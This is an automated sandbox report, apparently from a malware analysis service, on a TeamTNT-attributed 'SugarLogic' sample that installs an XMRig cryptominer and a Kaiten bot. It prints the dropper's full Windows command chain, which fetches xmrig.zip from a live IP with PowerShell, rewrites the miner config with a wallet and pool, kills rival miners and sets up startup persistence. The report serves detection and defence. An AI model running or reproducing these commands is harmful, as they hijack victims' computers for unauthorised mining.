Analysis Overview
SHA256
317806eaebb1cec9ddb962ef7fa19ee0673a67db3a8c7d650d76885041031ce8
Threat Level: Known bad
The file SugarLogic_#[email protected] was found to be: Known bad.
Malicious Activity Summary
Kaiten family
Identified Kaiten Bot
XMRig Miner Payload
xmrig
Xmrig family
XMRig Miner Payload
Blocklisted process makes network request
Stops running service(s)
Executes dropped EXE
Drops startup file
Launches sc.exe
Kills process with taskkill
Enumerates processes with tasklist
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-10-29 19:09
Signatures
Identified Kaiten Bot
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Kaiten family
XMRig Miner Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xmrig family
Analysis: behavioral4
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
debian9-armhf-en-20211025
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/566148710/payload.dat
[/tmp/566148710/payload.dat]
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
ubuntu1804-amd64-en-20211025
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
debian9-armhf-en-20211025
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/128429670/payload.dat
[/tmp/128429670/payload.dat]
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
debian9-mipsel-en-20211025
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/217523984/payload.dat
[/tmp/217523984/payload.dat]
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win10-en-20211014
Max time kernel
123s
Max time network
147s
Command Line
Signatures
xmrig
XMRig Miner Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\moneroocean\xmrig.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\xmrig.exe | N/A |
Stops running service(s)
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\moneroocean_miner.bat | C:\Windows\system32\cmd.exe | N/A |
Launches sc.exe
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\where.exe
where powershell
C:\Windows\system32\where.exe
where find
C:\Windows\system32\where.exe
where findstr
C:\Windows\system32\where.exe
where tasklist
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\system32\sc.exe
sc stop moneroocean_miner
C:\Windows\system32\sc.exe
sc delete moneroocean_miner
C:\Windows\system32\taskkill.exe
taskkill /f /t /im xmrig.exe
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Users\Admin\moneroocean\xmrig.exe
"C:\Users\Admin\moneroocean\xmrig.exe" --help
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"94.130.12.27:3333\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"438ss2gYTKze7kMqrgUagwEjtm993CVHk1uKHUBZGy6yPaZ2WNe5vdDFXGoVvtf7wcbiAUJix3NR9Ph1aq2NqSgyBkVFEtZ\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"WinTendo\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
C:\Windows\system32\tasklist.exe
tasklist /fi "imagename eq xmrig.exe"
C:\Windows\system32\find.exe
find ":"
C:\Users\Admin\moneroocean\xmrig.exe
C:\Users\Admin\moneroocean\xmrig.exe --config="C:\Users\Admin\moneroocean\config_background.json"
Network
| Country | Destination | Domain | Proto |
| DE | 85.214.149.236:443 | 85.214.149.236 | tcp |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
memory/2272-117-0x0000000000000000-mapping.dmp
memory/3368-118-0x0000000000000000-mapping.dmp
memory/3964-119-0x0000000000000000-mapping.dmp
memory/1192-120-0x0000000000000000-mapping.dmp
memory/644-121-0x0000000000000000-mapping.dmp
memory/872-122-0x0000000000000000-mapping.dmp
memory/1036-123-0x0000000000000000-mapping.dmp
memory/2248-124-0x0000000000000000-mapping.dmp
memory/3716-125-0x0000000000000000-mapping.dmp
memory/528-126-0x0000000000000000-mapping.dmp
memory/1772-127-0x0000000000000000-mapping.dmp
memory/3668-128-0x0000000000000000-mapping.dmp
memory/3668-129-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp
memory/3668-130-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp
memory/3668-131-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp
memory/3668-132-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp
memory/3668-133-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp
memory/3668-134-0x0000020F9E790000-0x0000020F9E791000-memory.dmp
memory/3668-135-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp
memory/3668-136-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp
memory/3668-137-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp
memory/3668-138-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp
memory/3668-139-0x0000020FB8A60000-0x0000020FB8A61000-memory.dmp
memory/3668-140-0x0000020FB6900000-0x0000020FB6902000-memory.dmp
memory/3668-141-0x0000020FB6903000-0x0000020FB6905000-memory.dmp
memory/3668-142-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp
memory/3668-148-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp
memory/3668-149-0x0000020FB6906000-0x0000020FB6908000-memory.dmp
memory/3668-150-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp
memory/1732-151-0x0000000000000000-mapping.dmp
memory/1732-153-0x00000221427D0000-0x00000221427D2000-memory.dmp
memory/1732-154-0x00000221427D0000-0x00000221427D2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 56efdb5a0f10b5eece165de4f8c9d799 |
| SHA1 | fa5de7ca343b018c3bfeab692545eb544c244e16 |
| SHA256 | 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108 |
| SHA512 | 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc |
memory/1732-155-0x00000221427D0000-0x00000221427D2000-memory.dmp
memory/1732-157-0x00000221427D0000-0x00000221427D2000-memory.dmp
memory/1732-156-0x00000221427D0000-0x00000221427D2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 40ef7db7b590b37dbe14b834480916eb |
| SHA1 | 0b48e0e3631424f46ad5ef8d39d93421e9b9c5b6 |
| SHA256 | 186e56656bb4d26c0866bd16f8737ec01e2c647ea0cc22890caeb12be8cf8e4c |
| SHA512 | 7eb9cc596ce3a720a990e35281eb21570b89951af07d3eb4145c23be1e566cfb02c1df77c26101e5e17acaab1f985ef2e0d8b568ddb52db2a5699ababf1985a1 |
memory/1732-160-0x00000221427D0000-0x00000221427D2000-memory.dmp
memory/1732-161-0x00000221427D0000-0x00000221427D2000-memory.dmp
memory/1732-162-0x00000221427D0000-0x00000221427D2000-memory.dmp
memory/1732-164-0x00000221427D0000-0x00000221427D2000-memory.dmp
memory/1732-170-0x000002215ADF0000-0x000002215ADF2000-memory.dmp
memory/1732-172-0x000002215ADF3000-0x000002215ADF5000-memory.dmp
memory/1732-182-0x000002215D050000-0x000002215D051000-memory.dmp
memory/1732-183-0x000002215D080000-0x000002215D081000-memory.dmp
C:\Users\Admin\xmrig.zip
| MD5 | 877492e0bf1e064eef97339fd71990fd |
| SHA1 | 3f4988a2b1ca38850b8798974f01cd76815af684 |
| SHA256 | 17862610ea8190e3ed4d22099d324d9058b15c941ce97236405fc80d3c50d747 |
| SHA512 | 016fec4d0c9c9ad4ec6de82456bc41b1c59cfcf8c13781ce457b939f44a21b91c68decf02c05f39d4646e4480734b592c3c6753750b21836b231ab87e70f973d |
memory/1732-185-0x00000221427D0000-0x00000221427D2000-memory.dmp
memory/3448-186-0x0000000000000000-mapping.dmp
memory/3448-187-0x000002625E110000-0x000002625E112000-memory.dmp
memory/3448-188-0x000002625E110000-0x000002625E112000-memory.dmp
memory/3448-189-0x000002625E110000-0x000002625E112000-memory.dmp
memory/3448-190-0x000002625E110000-0x000002625E112000-memory.dmp
memory/3448-191-0x000002625E110000-0x000002625E112000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0d66cbceb3ec62c57dd66cc0f4282156 |
| SHA1 | f5373d3010118067555c7a4a8ef8817f910b4dfc |
| SHA256 | dc603c5cdd5dd1394df01bcd9279807564149d545d1aca2b4950536dd808f46a |
| SHA512 | dd0a747710e5008f4ac7f5519d40fccb876fcff5ce592f39d25b55d78cf01763cb33a5246afd51f3fdb0518510c7f74eafd424cc1132343957bf3bf74ce1b4d1 |
memory/3448-194-0x000002625E110000-0x000002625E112000-memory.dmp
memory/3448-195-0x000002625E110000-0x000002625E112000-memory.dmp
memory/3448-197-0x000002625E110000-0x000002625E112000-memory.dmp
memory/3448-196-0x000002625E110000-0x000002625E112000-memory.dmp
memory/1732-199-0x000002215ADF6000-0x000002215ADF8000-memory.dmp
memory/3448-200-0x0000026278090000-0x0000026278092000-memory.dmp
memory/3448-201-0x0000026278093000-0x0000026278095000-memory.dmp
memory/3448-202-0x000002625E110000-0x000002625E112000-memory.dmp
C:\Users\Admin\moneroocean\config.json
| MD5 | bfa626e053028f9adbfaceb5d56086c3 |
| SHA1 | acf9d3be3211c8f96b823517ea83888982d498d3 |
| SHA256 | c17e1a22b7bc00e591aede9d101b843ff2e47d5b582bb0628406bbd53b7dac78 |
| SHA512 | 692115d964b98f380c0f45a9e25dc3d22bc53447c1aa76732103e7ac1807459c45348d873dcb0eeb92ca38f9a954f27078a8f4a3508ca5b4b3809a92f02765d0 |
memory/2712-212-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\xmrig.exe
| MD5 | 90ba713a657fe704ca05fbcfd967c245 |
| SHA1 | 020c59739d08b12008554ec48af07ec35d12f178 |
| SHA256 | 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847 |
| SHA512 | 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3 |
C:\Users\Admin\moneroocean\xmrig.exe
| MD5 | 90ba713a657fe704ca05fbcfd967c245 |
| SHA1 | 020c59739d08b12008554ec48af07ec35d12f178 |
| SHA256 | 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847 |
| SHA512 | 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3 |
memory/3448-216-0x0000026278096000-0x0000026278098000-memory.dmp
memory/2976-217-0x0000000000000000-mapping.dmp
memory/3516-218-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fb273c9c89cac500fcbadabed98e3375 |
| SHA1 | e2563ab7ad20b04b1aa62a9aaf4862be800ae2bf |
| SHA256 | bfa054896268067d7d081d4ff4e1731ad8f88ec92e523ff736137ba75977a8d8 |
| SHA512 | ec31170d7279822739a2c45af21df92a32294757bad8bcf3b609e0b489319ad784f706fd1a9db43c9e7a9223b76306420f1a81fdd98fccd856bb62e82d7ddfe1 |
memory/2152-231-0x0000000000000000-mapping.dmp
memory/2684-233-0x0000000000000000-mapping.dmp
memory/3516-240-0x0000016D47A10000-0x0000016D47A12000-memory.dmp
memory/3516-241-0x0000016D47A13000-0x0000016D47A15000-memory.dmp
memory/3516-242-0x0000016D47A16000-0x0000016D47A18000-memory.dmp
memory/2684-243-0x0000024634AB0000-0x0000024634AB2000-memory.dmp
memory/2684-244-0x0000024634AB3000-0x0000024634AB5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ba8ae666e929aa64d0504993fba65ee9 |
| SHA1 | 89c35367510d0153cef20bd7d2b31a5470b1e441 |
| SHA256 | 2baa317c75ad71a43c1873cb2931eed865638179d918c790b900e6fb0873624c |
| SHA512 | 2e26fdd7778c15df72c36c9718015d82c6d5c62232f5ea41c11ebf846f84cdc4d48c8c1bce16a76eca995e9c441a7442523b12f794f54f813f347e07beb3be43 |
C:\Users\Admin\moneroocean\config.json
| MD5 | 2a7d154f3f4a62932f80ea0d62776fb1 |
| SHA1 | d8bc14b26073d8da26b3801d5f118c1c2fb9e916 |
| SHA256 | 8c5e3471399b12cd08552ca3608ef57ebfa6da170d82b6d4ee5c95ed06b902d8 |
| SHA512 | 64e50e4e45b1ffcd1f0655816541c55440376c87302ad468ec9111d409d0cb0a5ace31fb9ac90e881694eba7906e19175d23a336b2deb3c881555e4940390c23 |
memory/2640-261-0x0000000000000000-mapping.dmp
memory/2684-268-0x0000024634AB6000-0x0000024634AB8000-memory.dmp
memory/2640-269-0x000002CC7A890000-0x000002CC7A892000-memory.dmp
memory/2640-270-0x000002CC7A893000-0x000002CC7A895000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1bcb465bafde8c1434b1561ced728749 |
| SHA1 | 6f08eb9d57100b4876d7346d744fffe928ad6648 |
| SHA256 | 1db46b71c87b1e38dfd7af6d4dc1003122e1e78f2a24863349419ffdf602e034 |
| SHA512 | 773ec8962dc5563351acf67a8e2787ec56dbdbc96c62cebb9cb6fb6319ef62614fe0a3823aa02e82f1b46ed3b8d07e6efdf3eb19df05e22397b7ca552a2fcdfc |
C:\Users\Admin\moneroocean\config.json
| MD5 | 031168b8b85aa1ff67dbe665e3ea9fd1 |
| SHA1 | aa617eab33ad5d776a96bc79ad2c88205ff315b4 |
| SHA256 | d021106b60e81826150b4f5e50969cc66c3781c20faab66b8e795ebf938e7b6f |
| SHA512 | 32d88ac902f0bfc12085c9d77919c2f31d9bcf574cafe5a82f484c4a5e7c3c5676fa7fc3ffb2687c22b183f59ca80a8d178a3651328bf32a2c6e124bd09c1c0d |
memory/3472-287-0x0000000000000000-mapping.dmp
memory/2640-294-0x000002CC7A896000-0x000002CC7A898000-memory.dmp
memory/3472-295-0x0000024BF8280000-0x0000024BF8282000-memory.dmp
memory/3472-296-0x0000024BF8283000-0x0000024BF8285000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9a829f9f5ded3f9a1ec326f6a6cab345 |
| SHA1 | 738e6ce9004d7463811ae2ac8000c701736386ba |
| SHA256 | 5348f58a41191272bb3416915d5cd0ef7e8d7333f9c499541439daac6e3a9f31 |
| SHA512 | 88740d927926c36df4f81f9637bcf45f709330fb27b34bac50838ddc28f8e1a95de88c3c7bba66f360727fa337fa3e53c71c0cfed1cf830e6e65b4d27bed8563 |
C:\Users\Admin\moneroocean\config.json
| MD5 | 115d22c264f7912e7d02307386db8c53 |
| SHA1 | fe96e575df30c6c3b4f1c3a331d6641f7061726e |
| SHA256 | 38b5c830e728ac133ac5f8153f48f0e90c74dfdbde73426de2331dde69300c9a |
| SHA512 | 0390fd713b7a413eff753f9ab5e3779cf3c0a59b0dbd701e58bae5be222c3ae846dc0605c4802a1851e1e3f371c0baf28560b5bbf98a4131857ee1e0fb864bd8 |
memory/1688-313-0x0000000000000000-mapping.dmp
memory/1688-321-0x0000015D7E9D0000-0x0000015D7E9D2000-memory.dmp
memory/3472-319-0x0000024BF8286000-0x0000024BF8288000-memory.dmp
memory/1688-322-0x0000015D7E9D3000-0x0000015D7E9D5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6ca7324beb2215be243500bc82290706 |
| SHA1 | 1108f05689bda703ebe065f6dfe9f7bf551b2642 |
| SHA256 | 307f464ddd8139dc577c3cd42248c146c86004f83c215f324e634852311819e5 |
| SHA512 | e15a169632ed6b8745c02af105316acce972c8e9eec1a228492562ba7424e0948692979f7f28b7b536a73a7698c15268c6c260eedd6ea423f757ef1febaeb9d3 |
C:\Users\Admin\moneroocean\config.json
| MD5 | c35b704c05e2018ce71f35b4be6d687b |
| SHA1 | 7771d19d56d23d3d6f38df5c33a2f162c2b07493 |
| SHA256 | 53b163495576feeb58a418e067016223e9bcfaec0e3e2b0a7d6636c5c23b51d7 |
| SHA512 | 7ecfb37d3bf84959b923f9123053456db74016afc36ce29a6a55b5a6e6fe1d6abeff71724d61b1a499f97842fd711c6e2eaa3e7b885541fd3233aff2d2a24191 |
memory/2512-339-0x0000000000000000-mapping.dmp
memory/1688-343-0x0000015D7E9D6000-0x0000015D7E9D8000-memory.dmp
memory/2512-345-0x000001B2C0BC3000-0x000001B2C0BC5000-memory.dmp
memory/2512-347-0x000001B2C0BC0000-0x000001B2C0BC2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8c2b856bb67d0c963bae3a55dabb0c72 |
| SHA1 | b17fe6260d16fe6f764c026974d038c703da767d |
| SHA256 | dc9036fd9085a78a911ecd50f441acb6cc2a2f57f3f87cf434da3915dbe4f820 |
| SHA512 | c102956e405cba3b8bb9750705f19490414012b1a1178344971378c3bc4c64fb933261a43a557d2b0ecc0c2219daed3ac34fa939eeff5ba87b30b30a5f5efd52 |
C:\Users\Admin\moneroocean\config.json
| MD5 | bc60290fa5050425ae4a655f493802aa |
| SHA1 | 42df7d9c1e95a7e86c4652b7688d5ea5f03e2c47 |
| SHA256 | 6d2d16f7f250d2db6686c1db275145944cfefef2bdee67bb263f815e10ca3409 |
| SHA512 | 6eda5175e9dc409ee2ae09a5050d08cb910395ecbb81262fdfcc42adcdb078febabf40b4dab679d003aaf625f1645f616c56e4926d6ff331f797f5c368bab5f7 |
C:\Users\Admin\moneroocean\config.json
| MD5 | 05193fd0a7804c0389d4043816400804 |
| SHA1 | 9dfab5b729c059a690169de942919137643162ff |
| SHA256 | 6ec2240148b44dddc36db5b78aa92636c541940dd0e7ebfdbf209493fc1a2f52 |
| SHA512 | cc7af49aa14fd743c1a927160541934549d508e5042a8b6347986b91dee646fa61ce50b3cc16434bd628b8d005c1936ec9abe46c3370f5f9d9c0f240a3c9b997 |
memory/3184-366-0x0000000000000000-mapping.dmp
memory/2512-373-0x000001B2C0BC6000-0x000001B2C0BC8000-memory.dmp
memory/3184-374-0x000002B34BEB0000-0x000002B34BEB2000-memory.dmp
memory/3184-375-0x000002B34BEB3000-0x000002B34BEB5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 33ce3bd4c52bd058a32997d140983eb9 |
| SHA1 | 463dbf2a6a11f4f8d51ac7aadc6f03047e65f4f6 |
| SHA256 | bf3647a6aac8b0ca4da842b7825b004c7d01ba7db097abfc2f842568bdba8b8f |
| SHA512 | 38c82103ed33c7ccf6a1773eb36d5838b0b5e7d6289d3a3a69aec2f1b9170f2658399a64fd1d32fb968eb2285ce0f2cc2e9837a940eed6f5ecf7187653ed1539 |
C:\Users\Admin\moneroocean\config_background.json
| MD5 | 05193fd0a7804c0389d4043816400804 |
| SHA1 | 9dfab5b729c059a690169de942919137643162ff |
| SHA256 | 6ec2240148b44dddc36db5b78aa92636c541940dd0e7ebfdbf209493fc1a2f52 |
| SHA512 | cc7af49aa14fd743c1a927160541934549d508e5042a8b6347986b91dee646fa61ce50b3cc16434bd628b8d005c1936ec9abe46c3370f5f9d9c0f240a3c9b997 |
memory/3288-391-0x0000000000000000-mapping.dmp
memory/816-392-0x0000000000000000-mapping.dmp
memory/3184-393-0x000002B34BEB6000-0x000002B34BEB8000-memory.dmp
memory/3416-394-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\xmrig.exe
| MD5 | 90ba713a657fe704ca05fbcfd967c245 |
| SHA1 | 020c59739d08b12008554ec48af07ec35d12f178 |
| SHA256 | 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847 |
| SHA512 | 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3 |
C:\Users\Admin\moneroocean\config_background.json
| MD5 | 8b89a341da7415528c151ae4ab3d851c |
| SHA1 | 2b28ff8a983351ab6c73c61bb6e96135fb9368d2 |
| SHA256 | c5cbb3a890dd0ac355a4b2928d7dfc0448b53800682401457b1144b77d5339f0 |
| SHA512 | 1319cd72fbc51c80a5df03ed7f67f737b1acf59eaae195cde72e5d7d33f93c044c65800467e8e10021ab1881df0e22d6d2ca9661fa51f536d09f8f943d6c96e5 |
memory/3416-398-0x00000000001B0000-0x00000000001B4000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
ubuntu1804-amd64-en-20211025
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral31
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:59
Platform
win10-en-20210920
Max time kernel
110s
Max time network
126s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\nssm.exe
"C:\Users\Admin\AppData\Local\Temp\nssm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
win10-en-20211014
Max time kernel
12s
Max time network
17s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe"
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
ubuntu1804-amd64-en-20211025
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win10-en-20211014
Max time kernel
121s
Max time network
146s
Command Line
Signatures
xmrig
XMRig Miner Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\moneroocean\xmrig.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\nssm.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\nssm.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\nssm.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\nssm.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\nssm.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\nssm.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\nssm.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\xmrig.exe | N/A |
Stops running service(s)
Launches sc.exe
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init2.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\where.exe
where powershell
C:\Windows\system32\where.exe
where find
C:\Windows\system32\where.exe
where findstr
C:\Windows\system32\where.exe
where tasklist
C:\Windows\system32\where.exe
where sc
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\system32\sc.exe
sc stop moneroocean_miner
C:\Windows\system32\sc.exe
sc delete moneroocean_miner
C:\Windows\system32\taskkill.exe
taskkill /f /t /im xmrig.exe
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"
